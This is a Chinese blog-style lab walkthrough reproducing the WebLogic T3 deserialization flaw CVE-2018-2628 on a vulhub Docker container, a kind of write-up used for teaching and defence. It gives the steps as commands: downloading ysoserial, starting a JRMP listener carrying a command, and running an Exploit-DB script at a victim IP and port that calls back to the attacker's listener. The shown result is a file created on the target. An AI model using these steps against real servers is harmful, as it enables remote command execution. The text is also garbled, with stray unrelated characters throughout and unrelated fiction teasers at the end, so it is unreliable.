weblogic漏洞系列- WLS Core Components 反序列化命令執(zhí)行漏洞(CVE-2018-2628)

此漏洞產(chǎn)生于Weblogic T3服務(wù),當(dāng)開放Weblogic控制臺(tái)端口(默認(rèn)為7001端口)時(shí)刺覆,T3服務(wù)會(huì)默認(rèn)開啟严肪,因此會(huì)造成較大影響。

漏洞編號(hào):

CVE-2018-2628

影響范圍:

> Oracle WebLogic Server10.3.6.0
> 
> Oracle WebLogic Server12.2.1.2
> 
> Oracle WebLogic Server12.2.1.3
> 
> Oracle WebLogic Server12.1.3.0

漏洞原理:

http://blog.topsec.com.cn/ad_lab/cve-2018-2628-weblogic%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/

http://www.freebuf.com/vuls/169420.html

https://mp.weixin.qq.com/s/nYY4zg2m2xsqT0GXa9pMGA

使用Nmap探測(cè)目標(biāo)T3協(xié)議信息

image.png

漏洞復(fù)現(xiàn):

1谦屑、首先需要下載一個(gè)國(guó)外大佬寫的一款工具ysoserialhttp://www.vuln.cn/6295驳糯,這里有針對(duì)這款工具的分析)。

wget https://github.com/brianwrf/ysoserial/releases/download/0.0.6-pri-beta/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar

2氢橙、使用ysoserial啟動(dòng)一個(gè)JRMP Server

java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener [listen port] CommonsCollections1 [command]

【listen port】是JRMP Server 監(jiān)聽的端口

【Command】是想要執(zhí)行命令

image.png

3酝枢、使用exp向目標(biāo)發(fā)送數(shù)據(jù)包。(腳本鏈接:https://www.exploit-db.com/exploits/44553/

zksmile@xxx:~$ python CVE-2018-2628.py

Usage:

exploit.py [victim ip] [victim port] [path to ysoserial] [JRMPListener ip] [JRMPListener port] [JRMPClient]

[victim ip] :目標(biāo)IP

[victim port] : 目標(biāo)端口

[path to ysoserial] : ysoserial的路徑

[JRMPListener ip] : 步驟2中 攻擊機(jī)器的IP

[JRMPClient] :使用的是JRMPClient類

zksmile@xxx:~$ python CVE-2018-2628.py 172.18.0.2 7001 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 172.18.0.1 1099 JRMPClient
image.png

4悍手、進(jìn)入docker 容器中帘睦,文件已經(jīng)創(chuàng)建成功袍患。

zksmile@xxx:~/vulhub/weblogic/CVE-2018-2628$ sudo docker ps

CONTAINER ID        IMAGE               COMMAND              CREATED             STATUS              PORTS                              NAMES

9989f9948b12        vulhub/weblogic     "startWebLogic.sh"   7 hours ago         Up 7 hours          5556/tcp, 0.0.0.0:7001->7001/tcp   cve-2018-2628_weblogic_1

zksmile@xxx:~/vulhub/weblogic/CVE-2018-2628$ sudo docker exec -ti 9989f9948b12 /bin/bash

root@9989f9948b12:~/Oracle/Middleware# ls /tmp/

bea1061393648233859820.tmp  hsperfdata_root  wlstTemproot

cookie.txt                  packages         zksmile.txt

root@9989f9948b12:~/Oracle/Middleware#
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末,一起剝皮案震驚了整個(gè)濱河市竣付,隨后出現(xiàn)的幾起案子诡延,更是在濱河造成了極大的恐慌,老刑警劉巖古胆,帶你破解...
    沈念sama閱讀 216,692評(píng)論 6 501
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件肆良,死亡現(xiàn)場(chǎng)離奇詭異,居然都是意外死亡逸绎,警方通過查閱死者的電腦和手機(jī)惹恃,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 92,482評(píng)論 3 392
  • 文/潘曉璐 我一進(jìn)店門,熙熙樓的掌柜王于貴愁眉苦臉地迎上來桶良,“玉大人座舍,你說我怎么就攤上這事沮翔≡煞” “怎么了?”我有些...
    開封第一講書人閱讀 162,995評(píng)論 0 353
  • 文/不壞的土叔 我叫張陵采蚀,是天一觀的道長(zhǎng)疲牵。 經(jīng)常有香客問我,道長(zhǎng)榆鼠,這世上最難降的妖魔是什么纲爸? 我笑而不...
    開封第一講書人閱讀 58,223評(píng)論 1 292
  • 正文 為了忘掉前任,我火速辦了婚禮妆够,結(jié)果婚禮上识啦,老公的妹妹穿的比我還像新娘。我一直安慰自己神妹,他們只是感情好颓哮,可當(dāng)我...
    茶點(diǎn)故事閱讀 67,245評(píng)論 6 388
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著鸵荠,像睡著了一般冕茅。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上蛹找,一...
    開封第一講書人閱讀 51,208評(píng)論 1 299
  • 那天姨伤,我揣著相機(jī)與錄音,去河邊找鬼庸疾。 笑死乍楚,一個(gè)胖子當(dāng)著我的面吹牛,可吹牛的內(nèi)容都是我干的届慈。 我是一名探鬼主播徒溪,決...
    沈念sama閱讀 40,091評(píng)論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼凌箕,長(zhǎng)吁一口氣:“原來是場(chǎng)噩夢(mèng)啊……” “哼!你這毒婦竟也來了词渤?” 一聲冷哼從身側(cè)響起牵舱,我...
    開封第一講書人閱讀 38,929評(píng)論 0 274
  • 序言:老撾萬榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎缺虐,沒想到半個(gè)月后芜壁,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 45,346評(píng)論 1 311
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡高氮,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 37,570評(píng)論 2 333
  • 正文 我和宋清朗相戀三年慧妄,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片剪芍。...
    茶點(diǎn)故事閱讀 39,739評(píng)論 1 348
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡塞淹,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出罪裹,到底是詐尸還是另有隱情饱普,我是刑警寧澤,帶...
    沈念sama閱讀 35,437評(píng)論 5 344
  • 正文 年R本政府宣布状共,位于F島的核電站套耕,受9級(jí)特大地震影響,放射性物質(zhì)發(fā)生泄漏峡继。R本人自食惡果不足惜冯袍,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,037評(píng)論 3 326
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望碾牌。 院中可真熱鬧康愤,春花似錦、人聲如沸舶吗。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,677評(píng)論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)裤翩。三九已至资盅,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間踊赠,已是汗流浹背呵扛。 一陣腳步聲響...
    開封第一講書人閱讀 32,833評(píng)論 1 269
  • 我被黑心中介騙來泰國(guó)打工, 沒想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留筐带,地道東北人今穿。 一個(gè)月前我還...
    沈念sama閱讀 47,760評(píng)論 2 369
  • 正文 我出身青樓,卻偏偏與公主長(zhǎng)得像伦籍,于是被迫代替她去往敵國(guó)和親蓝晒。 傳聞我的和親對(duì)象是個(gè)殘疾皇子腮出,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 44,647評(píng)論 2 354

推薦閱讀更多精彩內(nèi)容